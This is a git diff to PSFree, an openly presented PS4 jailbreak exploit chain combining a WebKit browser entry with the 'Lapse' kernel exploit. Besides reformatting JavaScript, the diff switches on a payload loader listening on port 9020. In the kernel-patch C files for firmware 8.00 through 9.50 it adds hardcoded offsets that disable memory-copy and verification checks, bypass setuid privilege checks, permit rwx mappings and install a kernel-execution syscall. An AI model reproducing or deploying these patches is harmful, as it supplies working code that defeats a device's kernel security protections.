diff --git a/.prettierrc b/.prettierrc
new file mode 100644
index 0000000..5e3d37e
--- /dev/null
+++ b/.prettierrc
@@ -0,0 +1,3 @@
+{
+ "printWidth": 999
+}
diff --git a/README.md b/README.md
index 7dca378..ec3776d 100644
--- a/README.md
+++ b/README.md
@@ -7,7 +7,7 @@ PSFree is a collection of exploits for the PS4 console. The main focus of the re
* **Auto-detection:** Automatically detects console type and firmware version (via `src/config.mjs`).
* **WebKit Exploit (PSFree):** Entry point via the console's web browser.
* **Kernel Exploit (Lapse):** Escalates privileges to kernel level.
-* ~~Payload Loader: After successful kernel exploitation listens for a payload on port 9020.~~ **WIP**
+* **Payload Loader:** After successful kernel exploitation listens for a payload on port 9020.
## Vulnerability Scope
@@ -29,7 +29,6 @@ This table indicates firmware versions for which the *current version* of this r
## TODO List
-- [ ] Integrate payload loader (Test on 8.00-8.03)
- [ ] Rewrite JOP chains in `rop/ps4/850.mjs`, `rop/ps4/900.mjs`, and `rop/ps4/950.mjs`
- I scrapped the ones I had...
- [ ] `lapse.mjs`: Just set the bits for JIT privs
diff --git a/src/alert.mjs b/src/alert.mjs
index b5a7371..b344e7d 100644
--- a/src/alert.mjs
+++ b/src/alert.mjs
@@ -26,27 +26,17 @@ along with this program. If not, see . */
// We log the line and column numbers as well since some exceptions (like
// SyntaxError) do not show it in the stack trace.
-addEventListener('unhandledrejection', event => {
- const reason = event.reason;
- alert(
- 'Unhandled rejection\n'
- + `${reason}\n`
- + `${reason.sourceURL}:${reason.line}:${reason.column}\n`
- + `${reason.stack}`
- );
+addEventListener("unhandledrejection", (event) => {
+ const reason = event.reason;
+ alert(`Unhandled rejection\n${reason}\n${reason.sourceURL}:${reason.line}:${reason.column}\n${reason.stack}`);
});
-addEventListener('error', event => {
- const reason = event.error;
- alert(
- 'Unhandled error\n'
- + `${reason}\n`
- + `${reason.sourceURL}:${reason.line}:${reason.column}\n`
- + `${reason.stack}`
- );
- return true;
+addEventListener("error", (event) => {
+ const reason = event.error;
+ alert(`Unhandled error\n${reason}\n${reason.sourceURL}:${reason.line}:${reason.column}\n${reason.stack}`);
+ return true;
});
// we have to dynamically import the program if we want to catch its syntax
// errors
-import('./psfree.mjs');
+import("./psfree.mjs");
diff --git a/src/config.mjs b/src/config.mjs
index 4c3f856..dd17f1e 100644
--- a/src/config.mjs
+++ b/src/config.mjs
@@ -38,46 +38,46 @@ along with this program. If not, see . */
// check if value is in Binary Coded Decimal format
// assumes integer and is in the range [0, 0xffff]
function check_bcd(value) {
- for (let i = 0; i <= 12; i += 4) {
- const nibble = (value >>> i) & 0xf;
+ for (let i = 0; i <= 12; i += 4) {
+ const nibble = (value >>> i) & 0xf;
- if (nibble > 9) {
- return false;
- }
+ if (nibble > 9) {
+ return false;
}
+ }
- return true;
+ return true;
}
export function set_target(value) {
- if (!Number.isInteger(value)) {
- throw TypeError(`value not an integer: ${value}`);
- }
+ if (!Number.isInteger(value)) {
+ throw TypeError(`value not an integer: ${value}`);
+ }
- if (value >= 0x20000 || value < 0) {
- throw RangeError(`value >= 0x20000 or value < 0: ${value}`);
- }
+ if (value >= 0x20000 || value < 0) {
+ throw RangeError(`value >= 0x20000 or value < 0: ${value}`);
+ }
- const version = value & 0xffff;
- if (!check_bcd(version)) {
- throw RangeError(`value & 0xffff not in BCD format ${version}`);
- }
+ const version = value & 0xffff;
+ if (!check_bcd(version)) {
+ throw RangeError(`value & 0xffff not in BCD format ${version}`);
+ }
- target = value;
+ target = value;
}
function get_target_from_ua(useragent) {
- const pattern = /^Mozilla\/5\.0 \(?(?:PlayStation; )?PlayStation (4|5)[ \/]([0-9]{1,2}\.[0-9]{2})\)? AppleWebKit\/[0-9.]+ \(KHTML, like Gecko\)(?: Version\/[0-9.]+ Safari\/[0-9.]+)?$/;
- const match = pattern.exec(useragent);
- if (!match) {
- return;
- }
+ const pattern = /^Mozilla\/5\.0 \(?(?:PlayStation; )?PlayStation (4|5)[ \/]([0-9]{1,2}\.[0-9]{2})\)? AppleWebKit\/[0-9.]+ \(KHTML, like Gecko\)(?: Version\/[0-9.]+ Safari\/[0-9.]+)?$/;
+ const match = pattern.exec(useragent);
+ if (!match) {
+ return;
+ }
- if (match[1] == '4') {
- return parseInt(`0x0${match[2].replace('.', '').padStart(4, '0')}`);
- } else if (match[1] == '5') {
- return parseInt(`0x1${match[2].replace('.', '').padStart(4, '0')}`);
- }
+ if (match[1] == "4") {
+ return parseInt(`0x0${match[2].replace(".", "").padStart(4, "0")}`);
+ } else if (match[1] == "5") {
+ return parseInt(`0x1${match[2].replace(".", "").padStart(4, "0")}`);
+ }
}
export let target = null;
diff --git a/src/kpatch/800.c b/src/kpatch/800.c
index 510be7d..f393b6d 100644
--- a/src/kpatch/800.c
+++ b/src/kpatch/800.c
@@ -60,8 +60,20 @@ void do_patch(void) {
disable_cr0_wp();
- // patch amd64_syscall() to allow calling syscalls everywhere
+ // ChendoChap's patches from pOOBs4 ///////////////////////////////////////
+ // Initial patches
+ write16(kbase, 0x62d254, 0x9090); // veriPatch
+ write8(kbase, 0xacd, 0xeb); // bcopy
+ write8(kbase, 0x25e10d, 0xeb); // bzero
+ write8(kbase, 0x25e151, 0xeb); // pagezero
+ write8(kbase, 0x25e1cd, 0xeb); // memcpy
+ write8(kbase, 0x25e211, 0xeb); // pagecopy
+ write8(kbase, 0x25e3bd, 0xeb); // copyin
+ write8(kbase, 0x25e86d, 0xeb); // copyinstr
+ write8(kbase, 0x25e93d, 0xeb); // copystr
+
+ // patch amd64_syscall() to allow calling syscalls everywhere
// struct syscall_args sa; // initialized already
// u64 code = get_u64_at_user_address(td->tf_frame-tf_rip);
// int is_invalid_syscall = 0
@@ -95,19 +107,16 @@ void do_patch(void) {
// call qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args)
//
// sy_call() is the function that will execute the requested syscall.
- write16(kbase, 0x4b5, 0x9090);
- write16(kbase, 0x4b9, 0x9090);
write8(kbase, 0x4c2, 0xeb);
+ write16(kbase, 0x4b9, 0x9090);
+ write16(kbase, 0x4b5, 0x9090);
- // patch sys_mmap() to allow rwx mappings
-
- // patch maximum cpu mem protection: 0x33 -> 0x37
- // the ps4 added custom protections for their gpu memory accesses
- // GPU X: 0x8 R: 0x10 W: 0x20
- // that's why you see other bits set
- // ref: https://cturt.github.io/ps4-2.html
- write8(kbase, 0xfd03a, 0x37);
- write8(kbase, 0xfd03d, 0x37);
+ // patch sys_setuid() to allow freely changing the effective user ID
+ // ; PRIV_CRED_SETUID = 50
+ // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
+ // test eax, eax
+ // je ... ; patch je to jmp
+ write8(kbase, 0x34d696, 0xeb);
// patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings
//
@@ -119,8 +128,10 @@ void do_patch(void) {
// }
write32(kbase, 0x3ec68d, 0);
- // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
+ // TODO: Description of this patch. "prx"
+ write16(kbase, 0x318d84, 0xe990);
+ // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
// call ...
// mov r14, qword [rbp - 0xad0]
// cmp eax, 0x4000000
@@ -142,13 +153,14 @@ void do_patch(void) {
// ...
write32(kbase, 0x951c0, 0xc3c03148);
- // patch sys_setuid() to allow freely changing the effective user ID
-
- // ; PRIV_CRED_SETUID = 50
- // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
- // test eax, eax
- // je ... ; patch je to jmp
- write8(kbase, 0x34d696, 0xeb);
+ // patch sys_mmap() to allow rwx mappings
+ // patch maximum cpu mem protection: 0x33 -> 0x37
+ // the ps4 added custom protections for their gpu memory accesses
+ // GPU X: 0x8 R: 0x10 W: 0x20
+ // that's why you see other bits set
+ // ref: https://cturt.github.io/ps4-2.html
+ write8(kbase, 0xfd03a, 0x37);
+ write8(kbase, 0xfd03d, 0x37);
// overwrite the entry of syscall 11 (unimplemented) in sysent
//
@@ -164,15 +176,12 @@ void do_patch(void) {
// int sys_kexec(struct thread td, struct args *uap) {
// asm("jmp qword ptr [rsi]");
// }
-
- // sysent[11]
- const size_t offset_sysent_11 = 0x10fc6e0;
- // .sy_narg = 6
- write32(kbase, offset_sysent_11, 6);
+ // .sy_narg = 2
+ write32(kbase, 0x10fc6e0, 2);
// .sy_call = gadgets['jmp qword ptr [rsi]']
- write64(kbase, offset_sysent_11 + 8, kbase + 0xe629c);
+ write64(kbase, 0x10fc6e0 + 8, kbase + 0xe629c);
// .sy_thrcnt = SY_THR_STATIC
- write32(kbase, offset_sysent_11 + 0x2c, 1);
+ write32(kbase, 0x10fc6e0 + 0x2c, 1);
enable_cr0_wp();
}
diff --git a/src/kpatch/850.c b/src/kpatch/850.c
index 47f702b..c0420ae 100644
--- a/src/kpatch/850.c
+++ b/src/kpatch/850.c
@@ -60,8 +60,20 @@ void do_patch(void) {
disable_cr0_wp();
- // patch amd64_syscall() to allow calling syscalls everywhere
+ // ChendoChap's patches from pOOBs4 ///////////////////////////////////////
+ // Initial patches
+ write16(kbase, 0x624674, 0x9090); // veriPatch
+ write8(kbase, 0xacd, 0xeb); // bcopy
+ write8(kbase, 0x3a403d, 0xeb); // bzero
+ write8(kbase, 0x3a4081, 0xeb); // pagezero
+ write8(kbase, 0x3a40fd, 0xeb); // memcpy
+ write8(kbase, 0x3a4141, 0xeb); // pagecopy
+ write8(kbase, 0x3a42ed, 0xeb); // copyin
+ write8(kbase, 0x3a479d, 0xeb); // copyinstr
+ write8(kbase, 0x3a486d, 0xeb); // copystr
+
+ // patch amd64_syscall() to allow calling syscalls everywhere
// struct syscall_args sa; // initialized already
// u64 code = get_u64_at_user_address(td->tf_frame-tf_rip);
// int is_invalid_syscall = 0
@@ -95,19 +107,16 @@ void do_patch(void) {
// call qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args)
//
// sy_call() is the function that will execute the requested syscall.
- write16(kbase, 0x4b5, 0x9090);
- write16(kbase, 0x4b9, 0x9090);
write8(kbase, 0x4c2, 0xeb);
+ write16(kbase, 0x4b9, 0x9090);
+ write16(kbase, 0x4b5, 0x9090);
- // patch sys_mmap() to allow rwx mappings
-
- // patch maximum cpu mem protection: 0x33 -> 0x37
- // the ps4 added custom protections for their gpu memory accesses
- // GPU X: 0x8 R: 0x10 W: 0x20
- // that's why you see other bits set
- // ref: https://cturt.github.io/ps4-2.html
- write8(kbase, 0x826ea, 0x37);
- write8(kbase, 0x826ed, 0x37);
+ // patch sys_setuid() to allow freely changing the effective user ID
+ // ; PRIV_CRED_SETUID = 50
+ // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
+ // test eax, eax
+ // je ... ; patch je to jmp
+ write8(kbase, 0x22f3d6, 0xeb);
// patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings
//
@@ -119,8 +128,10 @@ void do_patch(void) {
// }
write32(kbase, 0x14d6dd, 0);
- // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
+ // TODO: Description of this patch. "prx"
+ write16(kbase, 0x17474, 0xe990);
+ // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
// call ...
// mov r14, qword [rbp - 0xad0]
// cmp eax, 0x4000000
@@ -142,13 +153,14 @@ void do_patch(void) {
// ...
write32(kbase, 0x3ad040, 0xc3c03148);
- // patch sys_setuid() to allow freely changing the effective user ID
-
- // ; PRIV_CRED_SETUID = 50
- // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
- // test eax, eax
- // je ... ; patch je to jmp
- write8(kbase, 0x22f3d6, 0xeb);
+ // patch sys_mmap() to allow rwx mappings
+ // patch maximum cpu mem protection: 0x33 -> 0x37
+ // the ps4 added custom protections for their gpu memory accesses
+ // GPU X: 0x8 R: 0x10 W: 0x20
+ // that's why you see other bits set
+ // ref: https://cturt.github.io/ps4-2.html
+ write8(kbase, 0x826ea, 0x37);
+ write8(kbase, 0x826ed, 0x37);
// overwrite the entry of syscall 11 (unimplemented) in sysent
//
@@ -164,15 +176,12 @@ void do_patch(void) {
// int sys_kexec(struct thread td, struct args *uap) {
// asm("jmp qword ptr [rsi]");
// }
-
- // sysent[11]
- const size_t offset_sysent_11 = 0x10fc7d0;
- // .sy_narg = 6
- write32(kbase, offset_sysent_11, 6);
+ // .sy_narg = 2
+ write32(kbase, 0x10fc7d0, 2);
// .sy_call = gadgets['jmp qword ptr [rsi]']
- write64(kbase, offset_sysent_11 + 8, kbase + 0xc810d);
+ write64(kbase, 0x10fc7d0 + 8, kbase + 0xc810d);
// .sy_thrcnt = SY_THR_STATIC
- write32(kbase, offset_sysent_11 + 0x2c, 1);
+ write32(kbase, 0x10fc7d0 + 0x2c, 1);
enable_cr0_wp();
}
diff --git a/src/kpatch/900.c b/src/kpatch/900.c
index ce994b6..41c8818 100644
--- a/src/kpatch/900.c
+++ b/src/kpatch/900.c
@@ -60,8 +60,20 @@ void do_patch(void) {
disable_cr0_wp();
- // patch amd64_syscall() to allow calling syscalls everywhere
+ // ChendoChap's patches from pOOBs4 ///////////////////////////////////////
+ // Initial patches
+ write16(kbase, 0x626874, 0x9090); // veriPatch
+ write8(kbase, 0xacd, 0xeb); // bcopy
+ write8(kbase, 0x2713fd, 0xeb); // bzero
+ write8(kbase, 0x271441, 0xeb); // pagezero
+ write8(kbase, 0x2714bd, 0xeb); // memcpy
+ write8(kbase, 0x271501, 0xeb); // pagecopy
+ write8(kbase, 0x2716ad, 0xeb); // copyin
+ write8(kbase, 0x271b5d, 0xeb); // copyinstr
+ write8(kbase, 0x271c2d, 0xeb); // copystr
+
+ // patch amd64_syscall() to allow calling syscalls everywhere
// struct syscall_args sa; // initialized already
// u64 code = get_u64_at_user_address(td->tf_frame-tf_rip);
// int is_invalid_syscall = 0
@@ -95,19 +107,16 @@ void do_patch(void) {
// call qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args)
//
// sy_call() is the function that will execute the requested syscall.
- write16(kbase, 0x4b5, 0x9090);
- write16(kbase, 0x4b9, 0x9090);
write8(kbase, 0x4c2, 0xeb);
+ write16(kbase, 0x4b9, 0x9090);
+ write16(kbase, 0x4b5, 0x9090);
- // patch sys_mmap() to allow rwx mappings
-
- // patch maximum cpu mem protection: 0x33 -> 0x37
- // the ps4 added custom protections for their gpu memory accesses
- // GPU X: 0x8 R: 0x10 W: 0x20
- // that's why you see other bits set
- // ref: https://cturt.github.io/ps4-2.html
- write8(kbase, 0x16632a, 0x37);
- write8(kbase, 0x16632d, 0x37);
+ // patch sys_setuid() to allow freely changing the effective user ID
+ // ; PRIV_CRED_SETUID = 50
+ // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
+ // test eax, eax
+ // je ... ; patch je to jmp
+ write8(kbase, 0x1a06, 0xeb);
// patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings
//
@@ -119,8 +128,10 @@ void do_patch(void) {
// }
write32(kbase, 0x80b8d, 0);
- // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
+ // TODO: Description of this patch. "prx"
+ write16(kbase, 0x23aec4, 0xe990);
+ // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
// call ...
// mov r14, qword [rbp - 0xad0]
// cmp eax, 0x4000000
@@ -142,13 +153,14 @@ void do_patch(void) {
// ...
write32(kbase, 0x221b40, 0xc3c03148);
- // patch sys_setuid() to allow freely changing the effective user ID
-
- // ; PRIV_CRED_SETUID = 50
- // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
- // test eax, eax
- // je ... ; patch je to jmp
- write8(kbase, 0x1a06, 0xeb);
+ // patch sys_mmap() to allow rwx mappings
+ // patch maximum cpu mem protection: 0x33 -> 0x37
+ // the ps4 added custom protections for their gpu memory accesses
+ // GPU X: 0x8 R: 0x10 W: 0x20
+ // that's why you see other bits set
+ // ref: https://cturt.github.io/ps4-2.html
+ write8(kbase, 0x16632a, 0x37);
+ write8(kbase, 0x16632d, 0x37);
// overwrite the entry of syscall 11 (unimplemented) in sysent
//
@@ -164,15 +176,12 @@ void do_patch(void) {
// int sys_kexec(struct thread td, struct args *uap) {
// asm("jmp qword ptr [rsi]");
// }
-
- // sysent[11]
- const size_t offset_sysent_11 = 0x1100520;
- // .sy_narg = 6
- write32(kbase, offset_sysent_11, 6);
+ // .sy_narg = 2
+ write32(kbase, 0x1100520, 2);
// .sy_call = gadgets['jmp qword ptr [rsi]']
- write64(kbase, offset_sysent_11 + 8, kbase + 0x4c7ad);
+ write64(kbase, 0x1100520 + 8, kbase + 0x4c7ad);
// .sy_thrcnt = SY_THR_STATIC
- write32(kbase, offset_sysent_11 + 0x2c, 1);
+ write32(kbase, 0x1100520 + 0x2c, 1);
enable_cr0_wp();
}
diff --git a/src/kpatch/903.c b/src/kpatch/903.c
index f249a56..8a32aab 100644
--- a/src/kpatch/903.c
+++ b/src/kpatch/903.c
@@ -60,8 +60,20 @@ void do_patch(void) {
disable_cr0_wp();
- // patch amd64_syscall() to allow calling syscalls everywhere
+ // ChendoChap's patches from pOOBs4 ///////////////////////////////////////
+ // Initial patches
+ write16(kbase, 0x624834, 0x9090); // veriPatch
+ write8(kbase, 0xacd, 0xeb); // bcopy
+ write8(kbase, 0x27107d, 0xeb); // bzero
+ write8(kbase, 0x2710c1, 0xeb); // pagezero
+ write8(kbase, 0x27113d, 0xeb); // memcpy
+ write8(kbase, 0x271181, 0xeb); // pagecopy
+ write8(kbase, 0x27132d, 0xeb); // copyin
+ write8(kbase, 0x2717dd, 0xeb); // copyinstr
+ write8(kbase, 0x2718ad, 0xeb); // copystr
+
+ // patch amd64_syscall() to allow calling syscalls everywhere
// struct syscall_args sa; // initialized already
// u64 code = get_u64_at_user_address(td->tf_frame-tf_rip);
// int is_invalid_syscall = 0
@@ -95,19 +107,16 @@ void do_patch(void) {
// call qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args)
//
// sy_call() is the function that will execute the requested syscall.
- write16(kbase, 0x4b5, 0x9090);
- write16(kbase, 0x4b9, 0x9090);
write8(kbase, 0x4c2, 0xeb);
+ write16(kbase, 0x4b9, 0x9090);
+ write16(kbase, 0x4b5, 0x9090);
- // patch sys_mmap() to allow rwx mappings
-
- // patch maximum cpu mem protection: 0x33 -> 0x37
- // the ps4 added custom protections for their gpu memory accesses
- // GPU X: 0x8 R: 0x10 W: 0x20
- // that's why you see other bits set
- // ref: https://cturt.github.io/ps4-2.html
- write8(kbase, 0x1662da, 0x37);
- write8(kbase, 0x1662dd, 0x37);
+ // patch sys_setuid() to allow freely changing the effective user ID
+ // ; PRIV_CRED_SETUID = 50
+ // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
+ // test eax, eax
+ // je ... ; patch je to jmp
+ write8(kbase, 0x1a06, 0xeb);
// patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings
//
@@ -119,8 +128,10 @@ void do_patch(void) {
// }
write32(kbase, 0x80b8d, 0);
- // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
+ // TODO: Description of this patch. "prx"
+ write16(kbase, 0x23ab94, 0xe990);
+ // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
// call ...
// mov r14, qword [rbp - 0xad0]
// cmp eax, 0x4000000
@@ -142,13 +153,14 @@ void do_patch(void) {
// ...
write32(kbase, 0x221810, 0xc3c03148);
- // patch sys_setuid() to allow freely changing the effective user ID
-
- // ; PRIV_CRED_SETUID = 50
- // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
- // test eax, eax
- // je ... ; patch je to jmp
- write8(kbase, 0x1a06, 0xeb);
+ // patch sys_mmap() to allow rwx mappings
+ // patch maximum cpu mem protection: 0x33 -> 0x37
+ // the ps4 added custom protections for their gpu memory accesses
+ // GPU X: 0x8 R: 0x10 W: 0x20
+ // that's why you see other bits set
+ // ref: https://cturt.github.io/ps4-2.html
+ write8(kbase, 0x1662da, 0x37);
+ write8(kbase, 0x1662dd, 0x37);
// overwrite the entry of syscall 11 (unimplemented) in sysent
//
@@ -164,15 +176,12 @@ void do_patch(void) {
// int sys_kexec(struct thread td, struct args *uap) {
// asm("jmp qword ptr [rsi]");
// }
-
- // sysent[11]
- const size_t offset_sysent_11 = 0x10fc520;
- // .sy_narg = 6
- write32(kbase, offset_sysent_11, 6);
+ // .sy_narg = 2
+ write32(kbase, 0x10fc520, 2);
// .sy_call = gadgets['jmp qword ptr [rsi]']
- write64(kbase, offset_sysent_11 + 8, kbase + 0x5325b);
+ write64(kbase, 0x10fc520 + 8, kbase + 0x5325b);
// .sy_thrcnt = SY_THR_STATIC
- write32(kbase, offset_sysent_11 + 0x2c, 1);
+ write32(kbase, 0x10fc520 + 0x2c, 1);
enable_cr0_wp();
}
diff --git a/src/kpatch/950.c b/src/kpatch/950.c
index 3c11415..47c8be0 100644
--- a/src/kpatch/950.c
+++ b/src/kpatch/950.c
@@ -60,8 +60,20 @@ void do_patch(void) {
disable_cr0_wp();
- // patch amd64_syscall() to allow calling syscalls everywhere
+ // ChendoChap's patches from pOOBs4 ///////////////////////////////////////
+ // Initial patches
+ write16(kbase, 0x624ae4, 0x9090); // veriPatch
+ write8(kbase, 0xacd, 0xeb); // bcopy
+ write8(kbase, 0x201c0d, 0xeb); // bzero
+ write8(kbase, 0x201c51, 0xeb); // pagezero
+ write8(kbase, 0x201ccd, 0xeb); // memcpy
+ write8(kbase, 0x201d11, 0xeb); // pagecopy
+ write8(kbase, 0x201ebd, 0xeb); // copyin
+ write8(kbase, 0x20236d, 0xeb); // copyinstr
+ write8(kbase, 0x20243d, 0xeb); // copystr
+
+ // patch amd64_syscall() to allow calling syscalls everywhere
// struct syscall_args sa; // initialized already
// u64 code = get_u64_at_user_address(td->tf_frame-tf_rip);
// int is_invalid_syscall = 0
@@ -95,19 +107,16 @@ void do_patch(void) {
// call qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args)
//
// sy_call() is the function that will execute the requested syscall.
- write16(kbase, 0x4b5, 0x9090);
- write16(kbase, 0x4b9, 0x9090);
write8(kbase, 0x4c2, 0xeb);
+ write16(kbase, 0x4b9, 0x9090);
+ write16(kbase, 0x4b5, 0x9090);
- // patch sys_mmap() to allow rwx mappings
-
- // patch maximum cpu mem protection: 0x33 -> 0x37
- // the ps4 added custom protections for their gpu memory accesses
- // GPU X: 0x8 R: 0x10 W: 0x20
- // that's why you see other bits set
- // ref: https://cturt.github.io/ps4-2.html
- write8(kbase, 0x122d7a, 0x37);
- write8(kbase, 0x122d7d, 0x37);
+ // patch sys_setuid() to allow freely changing the effective user ID
+ // ; PRIV_CRED_SETUID = 50
+ // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
+ // test eax, eax
+ // je ... ; patch je to jmp
+ write8(kbase, 0x1fa536, 0xeb);
// patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings
//
@@ -119,8 +128,10 @@ void do_patch(void) {
// }
write32(kbase, 0x196d3d, 0);
- // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
+ // TODO: Description of this patch. "prx"
+ write16(kbase, 0x19f724, 0xe990);
+ // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
// call ...
// mov r14, qword [rbp - 0xad0]
// cmp eax, 0x4000000
@@ -142,13 +153,14 @@ void do_patch(void) {
// ...
write32(kbase, 0x11960, 0xc3c03148);
- // patch sys_setuid() to allow freely changing the effective user ID
-
- // ; PRIV_CRED_SETUID = 50
- // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
- // test eax, eax
- // je ... ; patch je to jmp
- write8(kbase, 0x1fa536, 0xeb);
+ // patch sys_mmap() to allow rwx mappings
+ // patch maximum cpu mem protection: 0x33 -> 0x37
+ // the ps4 added custom protections for their gpu memory accesses
+ // GPU X: 0x8 R: 0x10 W: 0x20
+ // that's why you see other bits set
+ // ref: https://cturt.github.io/ps4-2.html
+ write8(kbase, 0x122d7a, 0x37);
+ write8(kbase, 0x122d7d, 0x37);
// overwrite the entry of syscall 11 (unimplemented) in sysent
//
@@ -164,15 +176,12 @@ void do_patch(void) {
// int sys_kexec(struct thread td, struct args *uap) {
// asm("jmp qword ptr [rsi]");
// }
-
- // sysent[11]
- const size_t offset_sysent_11 = 0x10f9500;
- // .sy_narg = 6
- write32(kbase, offset_sysent_11, 6);
+ // .sy_narg = 2
+ write32(kbase, 0x10f9500, 2);
// .sy_call = gadgets['jmp qword ptr [rsi]']
- write64(kbase, offset_sysent_11 + 8, kbase + 0x15a6d);
+ write64(kbase, 0x10f9500 + 8, kbase + 0x15a6d);
// .sy_thrcnt = SY_THR_STATIC
- write32(kbase, offset_sysent_11 + 0x2c, 1);
+ write32(kbase, 0x10f9500 + 0x2c, 1);
enable_cr0_wp();
}
diff --git a/src/lapse.mjs b/src/lapse.mjs
index 12281b5..90c5d62 100644
--- a/src/lapse.mjs
+++ b/src/lapse.mjs
@@ -25,72 +25,74 @@ along with this program. If not, see . */
// * RESTORE - code will repair kernel panic vulnerability
// * MEMLEAK - memory leaks that our code will induce
-import { Int } from './module/int64.mjs';
-import { mem } from './module/mem.mjs';
-import { clear_log, log, die, hex, hexdump } from './module/utils.mjs';
-import { cstr, jstr } from './module/memtools.mjs';
-import { page_size, context_size } from './module/offset.mjs';
-import { Chain } from './module/chain.mjs';
+import { Int } from "./module/int64.mjs";
+import { mem } from "./module/mem.mjs";
+import { log, die, hex, hexdump } from "./module/utils.mjs";
+import { cstr, jstr } from "./module/memtools.mjs";
+import { page_size, context_size } from "./module/offset.mjs";
+import { Chain } from "./module/chain.mjs";
-import {
- View1, View2, View4,
- Word, Long, Pointer,
- Buffer,
-} from './module/view.mjs';
+import { View1, View2, View4, Word, Long, Pointer, Buffer } from "./module/view.mjs";
-import * as rop from './module/chain.mjs';
-import * as config from './config.mjs';
+import * as rop from "./module/chain.mjs";
+import * as config from "./config.mjs";
-// Static imports for firmware configurations
-import * as fw_ps4_800 from './lapse/ps4/800.mjs';
-import * as fw_ps4_850 from './lapse/ps4/850.mjs';
-import * as fw_ps4_852 from './lapse/ps4/852.mjs';
-import * as fw_ps4_900 from './lapse/ps4/900.mjs';
-import * as fw_ps4_903 from './lapse/ps4/903.mjs';
-import * as fw_ps4_950 from './lapse/ps4/950.mjs';
+// static imports for firmware configurations
+import * as fw_ps4_800 from "./lapse/ps4/800.mjs";
+import * as fw_ps4_850 from "./lapse/ps4/850.mjs";
+import * as fw_ps4_852 from "./lapse/ps4/852.mjs";
+import * as fw_ps4_900 from "./lapse/ps4/900.mjs";
+import * as fw_ps4_903 from "./lapse/ps4/903.mjs";
+import * as fw_ps4_950 from "./lapse/ps4/950.mjs";
const t1 = performance.now();
// check if we are running on a supported firmware version
const [is_ps4, version] = (() => {
- const value = config.target;
- const is_ps4 = (value & 0x10000) === 0;
- const version = value & 0xffff;
- const [lower, upper] = (() => {
- if (is_ps4) {
- return [0x100, 0x1250];
- } else {
- return [0x100, 0x1020];
- }
- })();
-
- if (!(lower <= version && version < upper)) {
- throw RangeError(`invalid config.target: ${hex(value)}`);
+ const value = config.target;
+ const is_ps4 = (value & 0x10000) === 0;
+ const version = value & 0xffff;
+ const [lower, upper] = (() => {
+ if (is_ps4) {
+ return [0x100, 0x1250];
+ } else {
+ return [0x100, 0x1020];
}
+ })();
- return [is_ps4, version];
+ if (!(lower <= version && version < upper)) {
+ throw RangeError(`invalid config.target: ${hex(value)}`);
+ }
+
+ return [is_ps4, version];
})();
-// Set per-console/per-firmware offsets
+// set per-console/per-firmware offsets
const fw_config = (() => {
- if (is_ps4) {
- if (0x800 <= version && version < 0x850) { // 8.00, 8.01, 8.03
- return fw_ps4_800;
- } else if (0x850 <= version && version < 0x852) { // 8.50
- return fw_ps4_850;
- } else if (0x852 <= version && version < 0x900) { // 8.52
- return fw_ps4_852;
- } else if (0x900 <= version && version < 0x903) { // 9.00
- return fw_ps4_900;
- } else if (0x903 <= version && version < 0x950) { // 9.03, 9.04
- return fw_ps4_903;
- } else if (0x950 <= version && version < 0x1000) { // 9.50, 9.51, 9.60
- return fw_ps4_950;
- }
- } else {
- // TODO: PS5
+ if (is_ps4) {
+ if (0x800 <= version && version < 0x850) {
+ // 8.00, 8.01, 8.03
+ return fw_ps4_800;
+ } else if (0x850 <= version && version < 0x852) {
+ // 8.50
+ return fw_ps4_850;
+ } else if (0x852 <= version && version < 0x900) {
+ // 8.52
+ return fw_ps4_852;
+ } else if (0x900 <= version && version < 0x903) {
+ // 9.00
+ return fw_ps4_900;
+ } else if (0x903 <= version && version < 0x950) {
+ // 9.03, 9.04
+ return fw_ps4_903;
+ } else if (0x950 <= version && version < 0x1000) {
+ // 9.50, 9.51, 9.60
+ return fw_ps4_950;
}
- throw new RangeError(`unsupported console/firmware: ps${is_ps4 ? '4' : '5'}, version: ${hex(version)}`);
+ } else {
+ // TODO: PS5
+ }
+ throw new RangeError(`unsupported console/firmware: ps${is_ps4 ? "4" : "5"}, version: ${hex(version)}`);
})();
const pthread_offsets = fw_config.pthread_offsets;
@@ -134,6 +136,9 @@ const CPU_LEVEL_WHICH = 3;
const CPU_WHICH_TID = 1;
// sys/mman.h
+const PROT_READ = 1;
+const PROT_WRITE = 2;
+const PROT_EXEC = 4;
const MAP_SHARED = 1;
const MAP_FIXED = 0x10;
@@ -178,26 +183,28 @@ const num_leaks = 5;
const num_clobbers = 8;
let chain = null;
-async function init() {
- await rop.init();
- chain = new Chain();
+let nogc = [];
- rop.init_gadget_map(rop.gadgets, pthread_offsets, rop.libkernel_base);
+async function init() {
+ await rop.init();
+ chain = new Chain();
+
+ rop.init_gadget_map(rop.gadgets, pthread_offsets, rop.libkernel_base);
}
function sys_void(...args) {
- return chain.syscall_void(...args);
+ return chain.syscall_void(...args);
}
function sysi(...args) {
